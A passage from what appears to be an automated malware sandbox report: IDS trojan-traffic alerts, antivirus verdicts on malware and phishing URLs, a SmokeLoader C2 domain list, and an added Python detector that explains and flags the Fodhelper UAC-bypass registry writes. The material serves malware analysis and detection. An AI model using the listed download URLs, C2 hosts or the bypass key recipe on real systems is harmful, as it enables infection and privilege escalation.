                  Source Port:49782
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049892802039103 02/08/24-19:10:12.871767
                  SID:2039103
                  Source Port:49892
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249788802049467 02/08/24-19:09:18.731907
                  SID:2049467
                  Source Port:49788
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249779802049467 02/08/24-19:09:14.298787
                  SID:2049467
                  Source Port:49779
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249877802049467 02/08/24-19:10:04.337440
                  SID:2049467
                  Source Port:49877
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2259303802049467 02/08/24-19:10:24.439859
                  SID:2049467
                  Source Port:59303
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049760802039103 02/08/24-19:08:54.565967
                  SID:2039103
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249825802049467 02/08/24-19:09:34.536841
                  SID:2049467
                  Source Port:49825
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9104.21.45.24249714802019714 02/08/24-19:08:00.773935
                  SID:2019714
                  Source Port:49714
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:192.168.2.9185.196.8.2249831802049467 02/08/24-19:09:37.886437
                  SID:2049467
                  Source Port:49831
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9172.67.213.168497184432050577 02/08/24-19:08:02.324088
                  SID:2050577
                  Source Port:49718
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249822802049467 02/08/24-19:09:33.352606
                  SID:2049467
                  Source Port:49822
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249905802049467 02/08/24-19:10:18.713028
                  SID:2049467
                  Source Port:49905
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249850802049467 02/08/24-19:09:49.583279
                  SID:2049467
                  Source Port:49850
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249849802049467 02/08/24-19:09:48.972985
                  SID:2049467
                  Source Port:49849
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249852802049467 02/08/24-19:09:50.191522
                  SID:2049467
                  Source Port:49852
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249855802049467 02/08/24-19:09:52.001596
                  SID:2049467
                  Source Port:49855
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049757802039103 02/08/24-19:08:47.625929
                  SID:2039103
                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9104.21.83.220497234432050578 02/08/24-19:08:05.026835
                  SID:2050578
                  Source Port:49723
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249893802049467 02/08/24-19:10:12.860215
                  SID:2049467
                  Source Port:49893
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249896802049467 02/08/24-19:10:14.352917
                  SID:2049467
                  Source Port:49896
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2260102802049467 02/08/24-19:10:25.866317
                  SID:2049467
                  Source Port:60102
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249838802049467 02/08/24-19:09:42.801134
                  SID:2049467
                  Source Port:49838
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049752802039103 02/08/24-19:08:44.407767
                  SID:2039103
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249780802049467 02/08/24-19:09:14.867068
                  SID:2049467
                  Source Port:49780
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249844802049467 02/08/24-19:09:46.177648
                  SID:2049467
                  Source Port:49844
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.91.1.1.150164532050566 02/08/24-19:08:04.868954
                  SID:2050566
                  Source Port:50164
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249803802049467 02/08/24-19:09:26.537580
                  SID:2049467
                  Source Port:49803
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249885802049467 02/08/24-19:10:08.582993
                  SID:2049467
                  Source Port:49885
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249827802049467 02/08/24-19:09:36.103885
                  SID:2049467
                  Source Port:49827
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049765802039103 02/08/24-19:09:01.499637
                  SID:2039103
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249796802049467 02/08/24-19:09:22.520653
                  SID:2049467
                  Source Port:49796
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249879802049467 02/08/24-19:10:04.969999
                  SID:2049467
                  Source Port:49879
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249868802049467 02/08/24-19:10:00.038920
                  SID:2049467
                  Source Port:49868
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249880802049467 02/08/24-19:10:05.565778
                  SID:2049467
                  Source Port:49880
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249874802049467 02/08/24-19:10:02.523065
                  SID:2049467
                  Source Port:49874
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249791802049467 02/08/24-19:09:20.503427
                  SID:2049467
                  Source Port:49791
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249833802049467 02/08/24-19:09:39.117166
                  SID:2049467
                  Source Port:49833
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.172.128.9049731802856233 02/08/24-19:08:16.811090
                  SID:2856233
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249845802049467 02/08/24-19:09:47.131082
                  SID:2049467
                  Source Port:49845
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2257197802049467 02/08/24-19:10:22.440269
                  SID:2049467
                  Source Port:57197
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249854802049467 02/08/24-19:09:51.382768
                  SID:2049467
                  Source Port:49854
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249793802049467 02/08/24-19:09:21.677978
                  SID:2049467
                  Source Port:49793
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249863802049467 02/08/24-19:09:56.434089
                  SID:2049467
                  Source Port:49863
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049808802039103 02/08/24-19:09:27.936988
                  SID:2039103
                  Source Port:49808
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249891802049467 02/08/24-19:10:12.266147
                  SID:2049467
                  Source Port:49891
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249774802049467 02/08/24-19:09:10.756652
                  SID:2049467
                  Source Port:49774
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049820802039103 02/08/24-19:09:32.222013
                  SID:2039103
                  Source Port:49820
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249900802049467 02/08/24-19:10:16.161208
                  SID:2049467
                  Source Port:49900
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249869802049467 02/08/24-19:10:00.654537
                  SID:2049467
                  Source Port:49869
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249784802049467 02/08/24-19:09:17.200830
                  SID:2049467
                  Source Port:49784
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249882802049467 02/08/24-19:10:06.739733
                  SID:2049467
                  Source Port:49882
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.172.128.7949735802044243 02/08/24-19:08:19.831146
                  SID:2044243
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.172.128.7949735802044244 02/08/24-19:08:20.328929
                  SID:2044244
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049878802039103 02/08/24-19:10:04.633582
                  SID:2039103
                  Source Port:49878
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.172.128.7949735802044246 02/08/24-19:08:20.673065
                  SID:2044246
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249789802049467 02/08/24-19:09:19.301426
                  SID:2049467
                  Source Port:49789
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2250341802049467 02/08/24-19:10:19.803464
                  SID:2049467
                  Source Port:50341
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249811802049467 02/08/24-19:09:28.910879
                  SID:2049467
                  Source Port:49811
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249887802049467 02/08/24-19:10:09.768217
                  SID:2049467
                  Source Port:49887
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049802802039103 02/08/24-19:09:26.170204
                  SID:2039103
                  Source Port:49802
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249798802049467 02/08/24-19:09:24.129980
                  SID:2049467
                  Source Port:49798
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.91.1.1.163216532050567 02/08/24-19:08:00.727246
                  SID:2050567
                  Source Port:63216
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249775802049467 02/08/24-19:09:11.429424
                  SID:2049467
                  Source Port:49775
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249864802049467 02/08/24-19:09:57.442700
                  SID:2049467
                  Source Port:49864
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249890802049467 02/08/24-19:10:11.594519
                  SID:2049467
                  Source Port:49890
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249783802049467 02/08/24-19:09:16.613403
                  SID:2049467
                  Source Port:49783
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249812802049467 02/08/24-19:09:29.503204
                  SID:2049467
                  Source Port:49812
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249872802049467 02/08/24-19:10:01.878786
                  SID:2049467
                  Source Port:49872
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249901802049467 02/08/24-19:10:16.810636
                  SID:2049467
                  Source Port:49901
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249835802049467 02/08/24-19:09:41.024212
                  SID:2049467
                  Source Port:49835
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249853802049467 02/08/24-19:09:50.795211
                  SID:2049467
                  Source Port:49853
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249859802049467 02/08/24-19:09:54.548248
                  SID:2049467
                  Source Port:49859
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249888802049467 02/08/24-19:10:10.379849
                  SID:2049467
                  Source Port:49888
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049810802039103 02/08/24-19:09:28.879023
                  SID:2039103
                  Source Port:49810
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049756802039103 02/08/24-19:08:46.478100
                  SID:2039103
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249836802049467 02/08/24-19:09:41.610105
                  SID:2049467
                  Source Port:49836
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249801802049467 02/08/24-19:09:25.940566
                  SID:2049467
                  Source Port:49801
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249830802049467 02/08/24-19:09:37.277094
                  SID:2049467
                  Source Port:49830
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249799802049467 02/08/24-19:09:24.710478
                  SID:2049467
                  Source Port:49799
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249883802049467 02/08/24-19:10:07.365354
                  SID:2049467
                  Source Port:49883
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9172.67.152.52497164432050574 02/08/24-19:08:00.888334
                  SID:2050574
                  Source Port:49716
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249813802049467 02/08/24-19:09:30.257909
                  SID:2049467
                  Source Port:49813
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249773802049467 02/08/24-19:09:10.181251
                  SID:2049467
                  Source Port:49773
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249797802049467 02/08/24-19:09:23.517259
                  SID:2049467
                  Source Port:49797
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249886802049467 02/08/24-19:10:09.163427
                  SID:2049467
                  Source Port:49886
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249889802049467 02/08/24-19:10:10.981470
                  SID:2049467
                  Source Port:49889
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249807802049467 02/08/24-19:09:27.711722
                  SID:2049467
                  Source Port:49807
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249840802049467 02/08/24-19:09:44.369293
                  SID:2049467
                  Source Port:49840
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249843802049467 02/08/24-19:09:45.594918
                  SID:2049467
                  Source Port:49843
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249834802049467 02/08/24-19:09:40.099257
                  SID:2049467
                  Source Port:49834
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049766802039103 02/08/24-19:09:04.504992
                  SID:2039103
                  Source Port:49766
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249828802049467 02/08/24-19:09:36.679870
                  SID:2049467
                  Source Port:49828
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249837802049467 02/08/24-19:09:42.191478
                  SID:2049467
                  Source Port:49837
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.991.215.85.12049841802039103 02/08/24-19:09:44.057462
                  SID:2039103
                  Source Port:49841
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049764802039103 02/08/24-19:09:00.583538
                  SID:2039103
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249792802049467 02/08/24-19:09:21.068319
                  SID:2049467
                  Source Port:49792
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249832802049467 02/08/24-19:09:38.515899
                  SID:2049467
                  Source Port:49832
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9189.232.12.9049758802039103 02/08/24-19:08:49.494936
                  SID:2039103
                  Source Port:49758
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249904802049467 02/08/24-19:10:18.106358
                  SID:2049467
                  Source Port:49904
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249881802049467 02/08/24-19:10:06.151154
                  SID:2049467
                  Source Port:49881
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.9185.196.8.2249826802049467 02/08/24-19:09:35.488215
                  SID:2049467
                  Source Port:49826
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp                 Source IP    Destination IP  Source Port  Destination Port  SID      Protocol  Classtype
                  02/08/24-19:09:59.395371  192.168.2.9  185.196.8.22    49867        80                2049467  TCP       A Network Trojan was detected
                  02/08/24-19:09:13.646694  192.168.2.9  185.196.8.22    49778        80                2049467  TCP       A Network Trojan was detected
                  02/08/24-19:09:32.725299  192.168.2.9  185.196.8.22    49821        80                2049467  TCP       A Network Trojan was detected
                  02/08/24-19:09:52.646331  192.168.2.9  185.196.8.22    49856        80                2049467  TCP       A Network Trojan was detected
                  02/08/24-19:09:36.963530  192.168.2.9  91.215.85.120   49829        80                2039103  TCP       A Network Trojan was detected
                  02/08/24-19:09:55.804272  192.168.2.9  185.196.8.22    49862        80                2049467  TCP       A Network Trojan was detected
                  02/08/24-19:08:43.263813  192.168.2.9  189.232.12.90   49747        80                2039103  TCP       A Network Trojan was detected
                  02/08/24-19:10:14.987166  192.168.2.9  185.196.8.22    49897        80                2049467  TCP       A Network Trojan was detected
                  02/08/24-19:09:28.304880  192.168.2.9  185.196.8.22    49809        80                2049467  TCP       A Network Trojan was detected
                  02/08/24-19:08:45.348799  192.168.2.9  189.232.12.90   49753        80                2039103  TCP       A Network Trojan was detected
                  02/08/24-19:09:04.935514  192.168.2.9  185.196.8.22    49767        80                2049467  TCP       A Network Trojan was detected


                  AV Detection

                  Source: http://185.172.128.19/288c47bbc1871b439df19ff4df68f0776.exe | Avira URL Cloud: Label: malware
                  Source: http://185.172.128.127/syncUpd.exe | Avira URL Cloud: Label: malware
                  Source: http://sjyey.com/tmp/index.php | Avira URL Cloud: Label: malware
                  Source: http://5.42.64.33/ping.php?substr=four | Avira URL Cloud: Label: malware
                  Source: https://claimconcessionrebe.shop/api | Avira URL Cloud: Label: phishing
                  Source: http://emgvod.com/emd/1.jpg | Avira URL Cloud: Label: malware
                  Source: https://secretionsuitcasenioise.shop/api | Avira URL Cloud: Label: malware
                  Source: http://asx.sunaviat.com/data/pdf/may.exe | Avira URL Cloud: Label: malware
                  Source: http://emgvod.com/uploads/logo3.jpg | Avira URL Cloud: Label: phishing
                  Source: http://185.172.128.90/cpa/ping.php?substr=four&s=ab | Avira URL Cloud: Label: malware
                  Source: https://liabilityarrangemenyit.shop/api | Avira URL Cloud: Label: malware
                  Source: https://gemcreedarticulateod.shop/api | Avira URL Cloud: Label: phishing
                  Source: http://trmpc.com/check/index.php | Avira URL Cloud: Label: malware
                  Source: http://selebration17io.io/index.php | Avira URL Cloud: Label: malware
                  Source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
                  Source: C:\ProgramData\Drivers\csrss.exe | ReversingLabs: Detection: 87%
                  Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | ReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | ReversingLabs: Detection: 79%
                  Source: C:\Users\user\AppData\Local\Temp\671C.exe | ReversingLabs: Detection: 100%
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe | ReversingLabs: Detection: 87%
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe | ReversingLabs: Detection: 54%
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe | ReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\97EA.dll | ReversingLabs: Detection: 50%
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe | ReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe | ReversingLabs: Detection: 21%
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | ReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | ReversingLabs: Detection: 63%
                  Source: C:\Users\user\AppData\Roaming\afratej | ReversingLabs: Detection: 81%
                  Source: ccQGH1mKws.exe | ReversingLabs: Detection: 81%
                  Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\ProgramData\Drivers\csrss.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe | Joe Sandbox ML: detected
                  Source: C:\ProgramData\IMAP List Mailboxes 65\IMAP List Mailboxes 65.exe | Joe Sandbox ML: detected
                  Source: ccQGH1mKws.exe | Joe Sandbox ML: detected
                  Source: 8837.exe, 00000008.00000003.2745920242.00000000038F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

                  Exploits

                  Source: Yara match | File source: 10.2.93D2.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.93D2.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000A.00000002.1813537584.0000000000413000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.1863394121.0000000000413000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY

                  Privilege Escalation

                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Registry value created: DelegateExecute
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Registry value created: NULL "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
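The two registry writes above are the whole of the Fodhelper UAC bypass: fodhelper.exe auto-elevates and resolves the per-user `ms-settings` shell handler before UAC is consulted, so an empty `DelegateExecute` value plus a `(Default)` command under `HKCU\Software\Classes\ms-settings\Shell\Open\command` makes it launch the attacker's binary with high integrity. The report only shows the value names, so the key path in the check below is taken from the public description of the technique, not from this page. The following is an added example (not Joe Sandbox code) that scores registry-set events for that pattern; the event records are constructed inline to mirror the two lines above, and `RegSet`, `assess_fodhelper` and the `(Default)` spellings it accepts are this example's own conventions.

```python
"""Flag registry writes that complete the Fodhelper (ms-settings) UAC bypass."""
from dataclasses import dataclass

# Key that fodhelper.exe consults from the user's hive. Under a normal profile
# it does not exist at all, so any write to it by a non-installer process is
# worth a look even before the full pattern is present.
MS_SETTINGS_CMD = r"software\classes\ms-settings\shell\open\command"


@dataclass
class RegSet:
    process: str   # image that performed the write
    key: str       # full key path including hive
    value: str     # value name; "" / "(Default)" / "NULL" all mean the default value
    data: str      # written data


def _is_hijack_key(key: str) -> bool:
    k = key.lower().rstrip("\\")
    k = k.replace("hkey_current_user", "hkcu").replace("hkey_users", "hku")
    in_user_hive = k.startswith("hkcu\\") or k.startswith("hku\\")
    return in_user_hive and k.endswith(MS_SETTINGS_CMD)


def assess_fodhelper(events):
    """Group ms-settings handler writes by writing process and rate each group.

    Verdicts: 'fodhelper-uac-bypass' when both DelegateExecute and a default
    command are present, otherwise 'ms-settings-handler-tampering'.
    """
    by_writer = {}
    for e in events:
        if not _is_hijack_key(e.key):
            continue
        slot = by_writer.setdefault(e.process, {"delegate": False, "command": None})
        if e.value.lower() == "delegateexecute":
            slot["delegate"] = True          # data is normally empty; presence is what matters
        elif e.value in ("", "(Default)", "NULL"):
            slot["command"] = e.data         # what fodhelper.exe will ShellExecute as admin
    findings = []
    for proc, s in by_writer.items():
        complete = s["delegate"] and bool(s["command"])
        findings.append({
            "process": proc,
            "verdict": "fodhelper-uac-bypass" if complete else "ms-settings-handler-tampering",
            "command": s["command"],
        })
    return findings


# Constructed events modelled on the two 'Registry value created' lines of this
# report (key path assumed, see lead-in), plus one unrelated HKCU write.
PAYLOAD = r"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
SAMPLE_EVENTS = [
    RegSet(PAYLOAD, r"HKCU\Software\Classes\ms-settings\Shell\Open\command", "DelegateExecute", ""),
    RegSet(PAYLOAD, r"HKCU\Software\Classes\ms-settings\Shell\Open\command", "NULL", PAYLOAD),
    RegSet(r"C:\Windows\explorer.exe", r"HKCU\Software\Classes\.txt", "", "txtfile"),
]

if __name__ == "__main__":
    for f in assess_fodhelper(SAMPLE_EVENTS):
        print(f"{f['verdict']}: {f['process']} -> {f['command']}")
```

Remediation on a live host is to delete the whole `HKCU\Software\Classes\ms-settings` key; it is not part of a default profile, so there is nothing to restore.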

                  Bitcoin Miner

                  Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 33.2.288c47bbc1871b439df19ff4df68f076.exe.2e00e67.15.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000021.00000002.2027202659.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000021.00000002.2034312044.0000000003243000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

